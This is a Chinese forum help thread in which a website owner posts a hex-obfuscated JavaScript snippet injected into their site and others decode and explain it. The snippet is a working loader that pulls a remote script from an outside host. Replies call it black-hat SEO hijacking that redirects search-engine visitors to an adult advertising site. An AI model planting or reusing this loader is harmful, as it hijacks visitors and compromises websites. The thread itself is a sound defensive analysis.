网站多了一段加密js，麻烦帮看下是什么

enchong · 发表于 2021-1-31 01:10

;var head=document.getElementsByTagName('head')[0];var script=document.createElement('script');script['src']='\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73';head.appendChild(script);

x_kotaku · 发表于 2021-1-31 01:23

把这些输入到浏览器控制台就能显示结果了
"\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73"
结果：
"https://maccms.z23.web.core.windows.net/732d.js"

enchong · 发表于 2021-1-31 01:25

谢谢不需要解密了刚看到别人说的直接在网页中输出就可以了，查看了确实是广告代码

MT哥 · 发表于 2021-1-31 01:26

黑帽SEO的劫持代码
加载一个JS https://maccms.z23.web.core.windows.net/732d.js
指定搜索引擎跳转指定网站

error3 · 发表于 2021-1-31 06:30

对于网页JS加密。有控制台的浏览器可以把那段代码复制到控制台里，没有控制台的浏览器，在任意一个有js加密的网页的下方加入以下代码，运行后就可以在文本框中看到解密的内容。
<textarea name=jiemi></textarea>
<script>
jiemi.value=script;
</script>

hecheng8677 · 发表于 2021-1-31 08:12

enchong 发表于 2021-1-31 01:25
谢谢不需要解密了刚看到别人说的直接在网页中输出就可以了，查看了确实是广告代码

请问怎么操作？直接在浏览器F12的console输入吗？我输入后提示错误啊

涛之雨 · 发表于 2021-1-31 09:12

单引号中间一堆\x??的是16进制，console连单引号一起输入就可以了，
解码后是一个js

hxxps://maccms.z23.web.core.windows.net/732d.js

（防止误点，协议做了处理）

打开js一眼看见一个网站，

hxxps://tsnpx110.com/

打开后发现是个咳咳广告。。。

minibeetuaman · 发表于 2021-1-31 09:57

看了一下，JS根据网页response的关键字判断是否动态修改网页，加一些链接之类的

kk1212 · 发表于 2021-1-31 09:58

是通过JS实际的动态广告

Flytom · 发表于 2021-1-31 15:54

大佬快回复

帐号		自动登录	找回密码
密码			注册[Register]

[求助] 网站多了一段加密js，麻烦帮看下是什么